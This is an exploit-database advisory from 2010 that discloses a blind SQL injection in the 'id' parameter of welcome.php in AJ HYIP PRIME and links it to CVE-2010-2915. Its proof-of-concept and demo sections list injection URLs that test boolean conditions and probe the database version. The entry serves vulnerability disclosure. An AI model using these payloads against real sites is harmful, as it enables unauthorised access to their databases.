Lucene search
JosSEDB-ID:14435HistoryJul 22, 2010 - 12:00 a.m.
AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection
2010-07-2200:00:00
JosS
www.exploit-db.com
33
AI Score
7.4
Confidence
Low
AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- site: http://www.ajsquare.com/products/ajhyip/index.php
- about AJ HYIP:
AJ HYIP is a complete financial tool with no technical
knowledge required to manage the site. AJ HYIP software
is the latest and most advanced HYIP Script with excellent
navigation features. Our HYIP Script can be easily customized
to accustom your needs with a potential to generate heavy revenues.
~~ [POC]
http://target/path/welcome.php?id=3 [bSQL]
http://target/path/welcome.php?id=3 and 1=1
http://target/path/welcome.php?id=3 and 1=2
~~ [DEMO]
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=4
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=5
__h0__Related
cvelist
cvelist
CVE-2010-2915
2010-07-30 20:00:00
cve
cve
CVE-2010-2915
2010-07-30 20:30:02
nvd
nvd
CVE-2010-2915
2010-07-30 20:30:02
prion
prion
Sql injection
2010-07-30 20:30:00